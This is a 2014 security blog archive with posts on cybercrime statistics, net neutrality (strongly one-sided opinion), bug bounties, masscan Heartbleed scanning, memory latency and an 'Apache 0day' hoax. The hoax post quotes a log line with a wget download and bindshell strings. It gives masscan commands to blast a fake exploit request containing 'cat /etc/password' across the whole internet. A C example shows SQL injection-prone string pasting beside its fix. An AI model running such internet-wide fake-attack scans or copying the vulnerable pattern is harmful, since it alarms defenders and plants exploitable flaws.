Sunday, September 14, 2014

Hacker "weev" has left the United States

Hacker Andrew "weev" Auernheimer, who was unjustly persecuted by the US government and recently freed after a year in jail when the courts agreed his constitutional rights had been violated, has now left the United States for a non-extradition country:




I wonder what that means. On one hand, he could go full black-hat and go on a hacking spree. Hacking doesn't require anything more than a cheap laptop and a dial-up/satellite connection, so it can be done from anywhere in the world.

On the other hand, he could also go full white-hat. There is lots of useful white-hat research that we don't do because of the chilling effect of government. For example, in our VNC research, we don't test default password logins for some equipment, because this can be interpreted as violating the CFAA. However, if 'weev' never intends to travel to an extradition country, it's something he can do, reporting the results to help us secure systems.

Thirdly, he can now freely speak out against the United States. Again, while we theoretically have the right to "free speech", we see how those like Barrett Brown are in jail purely because they spoke out against the police-state.




Thursday, September 11, 2014

Rebuttal to Volokh's CyberVor post

The "Volkh Conspiracy" is a wonderful libertarian law blog. Strangely, in the realm of cyber, Volokh ignores his libertarian roots and instead chooses authoritarian commentators, like NSA lawyer Stewart Baker or former prosecutor Marcus Christian. I suspect Volokh is insecure about his (lack of) cyber-knowledge, and therefore defers to these "experts" even when it goes against his libertarian instincts.

The latest example is a post by Marcus Christian about the CyberVor network -- a network that stole 4.5 billion credentials, including 1.2 billion passwords. The data cited in support of its authoritarian conclusions has little value.

A "billion" credentials sounds like a lot, but in reality, few of those credentials are valid. In a separate incident yesterday, 5 million Gmail passwords were dumped to the Internet. Google analyzed the passwords and found only 2% were valid, and that automated defenses would likely have blocked exploitation of most of them. Certainly, 100,000 valid passwords is a large number, but it's not the headline 5 million number.

That's the norm in cyber. Authoritarian types who want to sell you something can easily quote outrageous headline numbers, and while others can recognize the data are hyped, few have the technical expertise to adequately rebut them. I speak at hacker conferences on the topic of password hacking [1] [2]; I can assure you those headline numbers are grossly inflated. They may be true after a fashion, but they do not imply what you think they do.

That blog post also cites a study by CSIS/McAfee claiming the economic cost of cybercrime is $475 billion per year. This number is similarly inflated, by 10 to 100 times.

We know the sources of income for hackers, such as credit card fraud, ransomware, and DDoS extortion. Of these, credit card fraud is by far the leading source of income. According to a July 2014 study by the US DoJ and FTC, all credit card fraud world-wide amounts to $5.55 billion per year. Since we know that less than half of this is due to hackers, and that credit card fraud is more than half of what hackers earn, this sets the upper limit on hacker income -- about 1% of what CSIS/McAfee claim as the cost of cybercrime. Of course, the costs incurred by hackers can be much higher than their income, but knowing their income puts us in the right ballpark.

Where CSIS/McAfee get their eye-popping numbers is vague estimates about such things as "loss of reputation" and "intellectual property losses". These numbers are arbitrary, depending upon a wide range of assumptions. Since we have no idea where they get such numbers, we can't put much faith in them.

Some of what they do divulge about their methods is obviously flawed. For example, when discussing why some countries don't report cybercrime losses, they say:
"that some countries are miraculously unaffected by cybercrime despite having no better defenses than countries with similar income levels that suffer higher loss—seems improbable"
This is wrong for two enormous reasons.

I developed a popular tool for scanning the Internet, and use it often to scan everything. Among the things this has taught me is that countries vary enormously, both in the way they exploit the Internet and in their "defenses". Two neighboring countries with similar culture and economic development can nonetheless vary widely in their Internet usage. In my personal experience, it is not improbable that two countries with similar income levels will suffer different losses.

The second reason the above statement is wrong is their view of "defenses", as if the level of defense (anti-virus, firewalls, intrusion prevention) has a bearing on rates of hacking. It doesn't. It's like cars: what matters most as to whether you die in an accident is how often you drive, how far, where, and how good a driver you are. What matters less are "defenses" like air bags and anti-lock brakes. That's why automobile death rates in America correlate with things like recessions, the weather, building of freeways, and cracking down on drunk drivers. What they don't correlate with are technological advances in "defenses" like air bags. These "defenses" aren't useless, of course, but drivers respond by driving more aggressively and paying less attention to the road. The same is true in cyber: technologies like intrusion prevention aren't a magic pill that wards off hackers, but a tool that allows increased risk taking and different tradeoffs when exploiting the Internet. What you get from better defenses is increased profits from the Internet, rather than decreased losses. I say this as the inventor of the "intrusion prevention system", a popular cyber-defense that is now a $2 billion/year industry.

That McAfee and CSIS see "defenses" the wrong way reflects the fact that McAfee wants to sell "defensive" products, and CSIS wants to sell authoritarian legislation. Their report is not an honest assessment from experts, but an attempt to persuade people into buying what these organizations have to sell.

By the way, that post mentions "SQL injection". It's a phrase you should pay attention to because it's been the most common way of hacking websites for over a decade. It's so easy that teenagers with little skill can use SQL injection to hack websites. It's also easily preventable: just use a thing called "parameterized queries" instead of a thing called "string pasting". Yet, schools keep pumping out website designers who know nothing of SQL injection and who "paste strings" together. This leads to the intractable problem that if you hire a university graduate to do your website, they'll put SQL injection flaws in the code that your neighbor's kid will immediately hack. Companies like McAfee try to sell you defenses like "WAFs" that only partly defend against the problem. The solution isn't adding "defenses" like WAFs, but changing the code from "string pasting" to "parameterized queries", which completely prevents the problem. That our industry thinks in terms of "adding defenses" from vendors like McAfee, instead of just fixing the problem, is why cybersecurity has become intractable in recent years.
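
To make the difference concrete, here's a minimal sketch in C, using SQLite as a stand-in database; the table, column, and variable names are invented for illustration:

#include <stdio.h>
#include <sqlite3.h>

/* 'db' is an open database handle; 'user_input' comes straight from the web request. */
void lookup_user(sqlite3 *db, const char *user_input)
{
    /* The vulnerable pattern: "string pasting" the input into the query.
     * Input like  ' OR '1'='1  changes the meaning of the SQL. */
    char query[256];
    snprintf(query, sizeof(query),
             "SELECT id FROM users WHERE name = '%s'", user_input);
    sqlite3_exec(db, query, NULL, NULL, NULL);

    /* The fix: a parameterized query. The input is bound as data, so the
     * database never interprets it as SQL, no matter what it contains. */
    sqlite3_stmt *stmt;
    sqlite3_prepare_v2(db, "SELECT id FROM users WHERE name = ?", -1, &stmt, NULL);
    sqlite3_bind_text(stmt, 1, user_input, -1, SQLITE_TRANSIENT);
    while (sqlite3_step(stmt) == SQLITE_ROW)
        ;   /* consume rows */
    sqlite3_finalize(stmt);
}

The second version is no harder to write than the first, which is the point: this isn't a tradeoff, it's just a habit schools fail to teach.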

Marcus Christian's post ends with the claim that "law enforcement agencies must assume broader roles and bear greater burdens", that "individual businesses cannot afford to face cybercriminals alone", and then paraphrases the text of recently proposed cybersecurity legislation. If you are libertarian, you should oppose this legislation. It's a power grab, increasing your own danger from law enforcement, and doing nothing to lessen the danger from hackers. I'm an expert in cybersecurity who helps companies defend against hackers, yet I'm regularly threatened and investigated by law enforcement thugs. They don't understand what I do; it's all witchcraft to them, so they see me as part of the problem rather than the solution. Law enforcement already has too much power in cyberspace; it needs to be rolled back, not extended.


In conclusion, rather than an "analysis" as Eugene Volokh claims, this post from Marcus Christian was transparent lobbying for legislation, with the standard distortion of data that the word "lobbying" implies. Readers of that blog shouldn't treat it as anything more than that.

Wednesday, September 10, 2014

What they claim about NetNeutrality is a lie

The EFF and other activists are promoting NetNeutrality in response to the FCC's request for comment. What they tell you is a lie. I thought I'd write up the major problems with their arguments.


“Save NetNeutrality”


Proponents claim they are trying to “save” NetNeutrality and preserve the status quo. This is a bald-faced lie.

The truth is that NetNeutrality is not now, nor has it ever been, the law. Fast-lanes have always been the norm. Most of your network traffic goes through fast-lanes (“CDNs”), for example.

The NPRM (the FCC request for comments we are all talking about here) quite clearly says: "Today, there are no legally enforceable rules by which the Commission can stop broadband providers from limiting Internet openness".

NetNeutrality means a radical change, from the free-market Internet we’ve had for decades to a government regulated utility like electricity, water, and sewer. If you like how the Internet has been running so far, then you should oppose the radical change to NetNeutrality.


“NetNeutrality is technical”


Proponents claim there is something “technical” about NetNeutrality, that the more of a geek/nerd you are, the more likely you are to support it. They claim NetNeutrality supporters have some sort of technical authority on the issue. This is a lie.

The truth is that NetNeutrality is pure left-wing dogma. That’s why the organizations supporting it are all well-known left-wing organizations, like Greenpeace, Daily Kos, and the EFF. You don’t see right-wing or libertarian organizations on the list supporting today’s protest. In contrast, other issues like the "SOPA blackout" and protests against the NSA enjoy wide bi-partisan support among right-wing, libertarian, and left-wing groups.

Your support of NetNeutrality correlates with your general political beliefs, not with your technical skill. One of the inventors of TCP/IP is Vint Cerf who supports NetNeutrality – and a lot of other left-wing causes. Another inventor is Bob Kahn, who opposes NetNeutrality and supports libertarian causes.

NetNeutrality is a political slogan only. It has as much technical meaning as "Hope and Change". Ask 10 people what the phrase technically means and you'll get 13 answers.

The only case where NetNeutrality correlates with technical knowledge is among those geeks who manage networks – and it’s an inverse correlation (they oppose it). That’s because they want technologists and not politicians deciding how to route packets.


“Fast lanes will slow down the Internet”


Proponents claim that fast-lanes for some will mean slow-lanes for everyone else. The opposite is true – the Internet wouldn’t work without fast lanes, because they shunt high-volume traffic off expensive long-distance links.

The fundamental problem with the Internet is the “tragedy of the commons” where a lot of people freeload off the system. This discourages investment needed to speed things up. Charging people for fast-lanes fixes this problem – it charges those willing to pay for faster speeds in order to invest in making the Internet faster. Everyone benefits – those in the new fast-lane, and those whose slow-lanes become less congested.

This is proven by "content delivery networks" or "CDNs", which are the most common form of fast lanes. (Proponents claim that CDNs aren't the fast lanes they are talking about, but that too is a lie). Most of your network traffic doesn't go across long-distance links to places like Silicon Valley. Instead, most of it goes to data centers in your local city, to these CDNs. Companies like Apple and Facebook maintain their own CDNs; others like Akamai and Lightspeed charge customers for the privilege of being hosted on their CDNs. CDNs are the very essence of fast lanes, and the Internet as we know it wouldn't happen without them.


“Bad things will happen”


NetNeutrality proponents claim bad things will happen in the future. These are lies, made-up stories designed to frighten you. You know they are made-up stories because NetNeutrality has never been the law, and the scary scenarios haven’t come to pass.

The left-wingers may be right, and maybe the government does indeed need to step in and regulate the Internet like a utility. But, we should wait for problems that arise and fix them – not start regulating to prevent bad things that would never actually occur. It’s the regulation of unlikely scenarios that is most likely to kill innovation on the future Internet. Today, corporations innovate first and ask forgiveness later, which is a far better model than having to ask a government bureaucrat whether they are allowed to proceed – then proceeding anyway by bribing or lobbying the bureaucrats.


“Bad things have happened”


Proponents claim that a few bad things have already happened. This is a lie, because they are creating a one-sided description of events.

For example, a few years ago, Comcast filtered BitTorrent traffic in a clear violation of NetNeutrality ideals. This was simply because the network gets overloaded during peak hours (5pm to 9pm) and BitTorrent users don’t particularly care about peak hours. Thus, by slowing down BitTorrent during peak hours, Comcast improved the network for everyone without inconveniencing BitTorrent users. It was a win-win solution to the congestion problem.

NetNeutrality activists hated the solution. Their furor caused Comcast to change their policy, no longer filtering BitTorrent, but imposing a 250-gigabyte bandwidth cap on all their users instead. This was a lose-lose solution; both BitTorrent users and Comcast's normal customers hated it, but NetNeutrality activists accepted it.

NetNeutrality activists describe the problem as whether or not Comcast should filter BitTorrent, as if filtering/not-filtering were the only two choices. That's a one-sided description of the problem. Comcast has a peak-hour congestion problem. The choices are to filter BitTorrent, impose bandwidth caps, bill by amount downloaded, bill low-bandwidth customers in order to subsidize high-bandwidth customers, let all customers suffer congestion, and so on. By giving a one-sided description of the problem, NetNeutrality activists make it look like Comcast was evil for choosing a bad solution to the problem, but in truth, all the alternatives are bad.

A similar situation is the dispute between NetFlix and Comcast. NetFlix has been freeloading off the system, making the 90% of low-bandwidth customers subsidize the 10% who do streaming video. Comcast is trying to make those who do streaming pay for the costs involved. They are doing so by making NetFlix use CDNs like all other heavy users of the network. Activists take a very narrow view of this, casting Comcast as the bad guy, but any technical analysis of the situation shows that NetFlix is the bad guy freeloading on the system, and Comcast is the good guy putting a stop to it.

Companies like Comcast must solve technical problems. NetNeutrality deliberately distorts the description of the problems in order to make corporations look evil. Comcast certainly has broadband (above 10mbps) monopolies in big cities, and we should distrust them, but the above examples were decided on technical grounds, not on rent-seeking monopolist grounds.


Conclusion


I'm not trying to sway your opinion on NetNeutrality, though of course it's quite clear I oppose it. Instead, I'm trying to prove that the activists protesting today are liars. NetNeutrality isn't the status quo or the current law, so it's not being "saved". NetNeutrality is pure left-wing politics, not technical, and activists have no special technical authority on the issue. Fast-lanes are how the Internet works; they don't cause slow-lanes for everyone else. The activists' stories of future doom are designed to scare you and aren't realistic, and their stories of past problems are completely distorted.





Frankly, activists are dishonest with themselves, as shown in the following tweet. In their eyes, Comcast is evil and "all about profits" because they lobby against NetNeutrality, while NetFlix is a responsible/good company because they support NetNeutrality. But of course, we all know that NetFlix is likewise "all about profits", and their support for NetNeutrality is purely because they will profit by it.





Thursday, September 04, 2014

Vuln bounties are now the norm

When you get sued for a cybersecurity breach (such as in the recent Home Depot case), one of the questions will be "did you follow industry norms?". Your opposition will hire expert witnesses like me to say "no, they didn't".

One of those norms you fail at is "Do you have a vuln bounty program?". These are programs that pay hackers to research and disclose vulnerabilities (bugs) in their products/services. Such bounty programs have proven their worth at companies like Google and Mozilla, and have spread through the industry. The experts in our industry agree: due-diligence in cybersecurity means that you give others an incentive to find and disclose vulnerabilities. Contrariwise, anti-diligence is threatening, suing, and prosecuting hackers for disclosing your vulnerabilities.

There are now two great bounty-as-a-service*** companies "HackerOne" and "BugCrowd" that will help you run such a program. I don't know how much it costs, but looking at their long customer lists, I assume it's not too much.

I point this out because a lot of Internet companies have either announced their own programs, or signed onto the above two services, such as the recent announcement by Twitter. All us experts think it's a great idea and that the tradeoffs are minor. I mean, a lot of us understand tradeoffs, such as why HTTPS is difficult for your website -- we don't see important tradeoffs for vuln bounties. It is now valid to describe this as a "norm" for cybersecurity.




By the way, I offer $100 in BitCoin for vulns in my tools that I publish on GitHub:
https://github.com/robertdavidgraham



*** Hacker1 isn't a "bounty-as-a-service" company but a "vuln coordination" service. However, all the high-profile customers they highlight offer bounties, so it comes out to much the same thing. They might not handle the bounties directly, but they are certainly helping the bounty process.




Update: One important tradeoff is that such bounty programs attract a lot of noise from idiots, such as "your website doesn't use SSL, now gimme my bounty" [from @beauwoods]. Therefore, even if you have no vulnerabilities, there is some cost to such programs. That's why BugCrowd and Hacker1 are useful: they can sift through the noise more efficiently than your own organization. However, this highlights a problem in your organization: if you don't have the expertise to filter through such noise (and many organizations don't), then you don't have the expertise to run a bug bounty program. Then again, that also means you aren't in a position to be trusted.

Update: Another cost [from @JardineSoftware] is that by encouraging people to test your site, you'll increase the number of false-positives on your IDS. It'll be harder now to distinguish testers from attackers. That's not a concern: the real issue is that you spend far too much time looking at inbound attacks already and not enough at successful outbound exfiltration of data. If encouraging testers doubles the number of IDS alerts, then that's a good thing not a bad thing.

Update: You want to learn about cybersecurity? Then just read what's in/out of scope for the Yahoo! bounty: https://hackerone.com/yahoo

Monday, August 25, 2014

Masscan does STARTTLS

Just a quick note: I've updated my port-scanner masscan to support STARTTLS, including Heartbleed checks. Thus, if you scan:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed

...then it'll find not only all vulnerable SSL servers, but also vulnerable SMTP/POP3/IMAP4/FTP servers using STARTTLS.

The issue is that there are two ways unencrypted protocols can support SSL. One is to assign a new port number (like 443 instead of 80), establish the SSL connection first, and then run the normal protocol within the encrypted tunnel. The second way is the method SMTP uses: it starts the normal unencrypted SMTP session, then issues the "STARTTLS" command to convert the connection to SSL, then continues the SMTP session over the encrypted connection.
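
For example, an SMTP session being upgraded looks roughly like this (an illustrative exchange, not a capture from any particular server):

S: 220 mail.example.com ESMTP ready
C: EHLO scanner.example.net
S: 250-mail.example.com
S: 250 STARTTLS
C: STARTTLS
S: 220 2.0.0 Ready to start TLS
   (the SSL handshake happens here, and the SMTP conversation continues inside the encrypted tunnel)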

Here's what a scan will look like:

Banner on port 143/tcp on 198.51.100.42: [ssl] cipher:0x39 , imap.example.com  
Banner on port 143/tcp on 198.51.100.42: [vuln] SSL[heartbeat] SSL[HEARTBLEED] 
Banner on port 143/tcp on 198.51.100.42: [imap] * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5] Dovecot ready.\x0a* CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN AUTH=DIGEST-MD5 AUTH=CRAM-MD5\x0aa001 OK Capability completed.\x0aa002

Because of the --banners option, we see the normal IMAP4 banners. Because the banner advertises STARTTLS, masscan will attempt to execute that feature. The SSL banner shows the name of the system "imap.example.com", and the vulnerability banner shows that it has heartbeats enabled, and that the software is vulnerable to Heartbleed.

I suggest you run this on all your outward facing sites on all ports -p0-65535 to find lots of Heartbleed vulnerable services that your normal vulnerability scanner might've missed.

I've probably introduced a bug doing this, so please update your code and try this out, and notify me of any bugs.


Note: if you want to also grab the full certificate with the SSL connection, use the option --capture cert to dump the BASE64 X.509 certificates as part of the scan.
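
For example, a scan that grabs certificates along with the Heartbleed check might look like this:

masscan 192.168.0.0/16 -p0-65535 --banners --heartbleed --capture cert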

Friday, August 15, 2014

Grow up, you babies

When I came home crying to my mommy because somebody at school called me "grahamcracker", my mother told me to just say "sticks and stones may break my bones but names will never hurt me". This frustrated me as a kid, because I wanted my mommy to make it stop, but of course, it's good advice. It was the only good advice back then, and it's the only solution now to stop Internet trolls.

In its quest to ban free speech, this NYTimes article can't even get the definition of the word "troll" right. Here's the correct definition:
"somebody who tries to provoke an emotional reaction"
The way to stop trolls is to grow up and stop giving them that emotional reaction. That's going to be difficult, because we have a nation of whiners and babies who don't want to grow up, who instead want the nanny-state to stop mean people from saying mean things. This leads to a police-state, where the powerful exploit anti-trolling laws to crack down on free-speech.

That NYTimes article claims that trolling leads to incivility. The opposite is true. Incivility doesn't come from me calling you a jerk. Instead, incivility comes from your inability to ignore it. It's your emotional response that is the problem, and your desire to sic the police-state on me to make me stop.

Let's work together and make our society more civil, and get people to stop responding to trolls. Let's tell the whining babies to grow the fuck up, and just repeat "sticks and stones may break my bones but names will never hurt me".

Saturday, August 02, 2014

C10M: The coming DDR4 revolution

Computer memory has been based on the same DRAM technology since the 1970s. Recent developments have been versions of the DDR technology: DDR2, DDR3, and now DDR4. The capacity and transfer speed have been doubling every couple of years according to Moore's Law, but the latency has been stuck at ~70 nanoseconds for decades. The recent DDR4 standard won't fix this latency, but will give us a lot more tools to mitigate its effects.


Latency is bad. If a thread needs data from main memory, it must stop and wait roughly the time it takes to execute 1000 instructions before the data is returned from memory. CPU caches mitigate most of this latency by keeping a copy of frequently used data in local, high-speed memory. This allows the processor to continue at full speed without having to wait.

The problem with Internet scale is that it can't be cached. If you have 10 million concurrent connections, each requiring 10-kilobytes of data, you'll need 100-gigabytes of memory. However, processors have only 20-megabytes of cache -- 5,000 times too small to cache everything. That means whenever a packet arrives, the memory associated with that packet will not be in cache. The CPU will have to stop and wait while the data is retrieved from memory.

There are some ways around this. Specialty network processors solve this by having 8 threads per CPU core (whereas Intel has only 2 or even 1 thread per core). At any point in time, 7 threads can be blocked waiting for data to arrive from main memory, while the 8th thread continues at full speed with data from the cache.

On Intel processors, we have only 2 threads per core. Instead, our primary strategy for solving this problem is prefetching: telling the CPU to read memory into the cache that we'll need in the future.
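
On x86 with GCC or Clang, a prefetch is just a compiler builtin that issues a non-blocking hint. A minimal sketch, where conn is a placeholder pointer to data we'll need shortly:

__builtin_prefetch(conn, 0, 3);  /* 0 = we'll read it, 3 = keep it in all cache levels */
/* ...do other useful work while the load completes in the background... */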

For these strategies to work, however, the CPU needs to be able to read memory in parallel. To understand this, we need to look into details about how DRAM works.

As you know, DRAM consists of a bunch of capacitors arranged in large arrays. To read memory, you first select a row, and then read each bit a column at a time. The problem is that it takes a long time to open the row before a read can take place. Also, before reading another row, the current row must be closed, which takes even more time. Most of memory latency is the time that it takes to close the current row and open the next row we want to read.

In order to allow parallel memory access, a chip will split the memory arrays into multiple banks, currently 4 banks. This now allows memory requests in parallel. The CPU issues a command to memory to open a row on bank #1. While it's waiting for the results, it can also issue a command to open a different row on bank #3.

Thus, with 4 banks, and random memory accesses, we can often have 4 memory requests happening in parallel at any point in time. The actual reads must happen sequentially, but most of the time, we'll be reading from one bank while waiting for another bank to open a row.

There is another way to increase parallel access, using multiple sets or ranks of chips. You'll often see that in DIMMs, where sometimes only one side is populated with chips (one rank), but other times both sides are populated (two ranks). In high density server memory, they'll double the size of the DIMMs, putting two ranks on each side.

There is yet another way to increase parallel access, using multiple channels. These are completely separate subsystems: not only can there be multiple commands outstanding to open a row on a given bank/rank, they can be streaming data from the chips simultaneously too. Thus, adding channels adds both to the maximum throughput as well as to the number of outstanding transactions.

A typical low-end system will have two channels, two ranks, and four banks giving a total of eight requests outstanding at any point in time.

Given a single thread, that means a C10M program with a custom TCP/IP stack can do creative things with prefetch. It can pull eight packets at a time from the incoming queue, hash them all, then do a prefetch on each one's TCP connection data. It can then process each packet as normal, being assured that all the data is now going to be in the cache instead of waiting on memory.
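
Here's a rough sketch of that pattern in C. The types and helper functions (hash_packet, lookup_connection, process) are placeholders for illustration, not masscan's actual code; lookup_connection is assumed to compute the record's address (say, an index into a big table) without touching the record itself:

#include <stddef.h>

#define BATCH 8

struct packet;
struct connection;
unsigned hash_packet(const struct packet *p);
struct connection *lookup_connection(unsigned hash);
void process(struct connection *c, const struct packet *p);

void handle_batch(struct packet *pkts[BATCH])
{
    struct connection *conns[BATCH];
    size_t i;

    /* Pass 1: hash every packet and issue a prefetch for its connection
     * state. The prefetches don't block, so all eight memory accesses
     * end up in flight at the same time. */
    for (i = 0; i < BATCH; i++) {
        conns[i] = lookup_connection(hash_packet(pkts[i]));
        __builtin_prefetch(conns[i], 0, 3);
    }

    /* Pass 2: by the time we come back around, the connection data
     * should already be sitting in the cache. */
    for (i = 0; i < BATCH; i++)
        process(conns[i], pkts[i]);
}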

The problem here is that low-end desktop processors have four cores with two threads each, or eight threads total. Since the memory only allows eight concurrent transactions, we have a budget of only a single outstanding transaction per thread. Prefetching will still help a little here, because parallel access only works when the requests land on different channels/ranks/banks. The more outstanding requests, the more the CPU can choose from to work in parallel.


Now, here's where DDR4 comes into play: it dramatically increases the number of outstanding requests. It increases the number of banks from the standard 4 to 16. It also increases ranks from 4 to 8. By itself, this is an 8 fold increase in outstanding commands.

But it goes even further. A hot new technology is stacked chips. You see that in devices like the Raspberry Pi, where the 512-megabyte DDR3 DRAM chip is stacked right on top of the ARM CPU, appearing to the outside world as a single chip.

For DDR4, designers plan on up to eight stacked DRAM chips. They've added chip select bits to select which chip in the stack is being accessed. Thus, this gives us a 256-fold theoretical increase in the number of outstanding transactions.

Intel has announced their Haswell-E processors with 8 hyperthreaded cores (16 threads total). This chip has 4 channels of DDR4 memory. Even a low-end configuration with only 32-gigs of RAM will still give you 16 banks times 2 ranks times 4 channels, or 128 outstanding transactions for 16 threads, or 8 outstanding transactions per thread.

But that's only with unstacked, normal memory. Vendors are talking about stacked packages that will increase this even further -- though it may take a couple years for these to come down in price.

This means that whereas in the past, prefetch has made little difference to code that was already limited by the number of outstanding memory transactions, it can make a big difference in future code with DDR4 memory.

Conclusion

This post is about getting Internet scale out of desktop hardware. An important limitation for current systems is the number of outstanding memory transactions possible with existing DRAM technology. New DDR4 memory will dramatically increase the number of outstanding transactions. This means that techniques like prefetch, which had limited utility in the past, may become much more useful in the future.

That Apache 0day was a troll

Last week, many people saw what they thought was an Apache 0day. They saw logs with lots of suggestive strings that looked like this:

[28/Jul/2014:20:04:07 +0000] "GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0" 301 178 "-" "chroot-apach0day-HIDDEN BINDSHELL-ESTAB" "-"
Somebody has come forward and taken credit for this, admitting it was a troll.

This is sort of a personality test. Many of us immediately assumed this was a troll, but that's because we are apt to disbelieve any hype. Others saw this as some new attack, but that's because they are apt to see attacks out of innocuous traffic. If your organization panicked at this "0day attack", which I'm sure some did, then you failed this personality test.


I don't know what tool the troll used, but I assume it was masscan, because that'd be the easiest way to do it. To do this with masscan, get a Debian/Ubuntu VPS and do the following:

apt-get install libpcap-dev dos2unix
git clone https://github.com/robertdavidgraham/masscan
cd masscan
make
echo "GET /my0dayexploit.php?a=\x0acat+/etc/password HTTP/1.0" >header.txt
echo "Referer: http://troll.com" >>header.txt
echo "" >>header.txt
unix2dos header.txt
iptables -A INPUT -p tcp --destination-port 4321 -j DROP

bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-port 4321 --rate 1500000

Depending on the rate your VPS can transmit, you'll cover the entire Internet in one to ten hours.

The response output from servers will be printed to the screen. You probably don't want that, so you should add the "-oX troll.xml" option to save the responses to an XML file instead.

The above example uses "echo" to append lines of text to a file since HTTP is conveniently a text-based protocol. It uses "unix2dos" to convert the line-feeds into the cr-lf combination that HTTP wants.

Masscan has its own TCP/IP stack. Thus, on Linux, it can't establish a TCP connection, because when it tries, the existing TCP stack sees something wrong and sends a RST to kill the connection. One way to prevent this is to configure a firewall rule to tell the built-in Linux TCP/IP stack to ignore the port that masscan uses. Another way is to tell masscan to use a --source-ip that isn't assigned to any existing machine on the network.
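
For example (192.0.2.200 is just a placeholder for an unused address on your local subnet):

bin/masscan 0.0.0.0/0 -p80 --banners --hello-file header.txt --source-ip 192.0.2.200 --rate 1500000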

The rates at which you can transmit vary widely by hosting provider. In theory, you should get a rate of 1.5-million packets/second, and that's easily obtained in a lab on slow machines. Yet, in real hosting environments, things slow down, and I haven't been able to figure out why. In my experience, 300,000 packets/second is more like what you'd expect to get.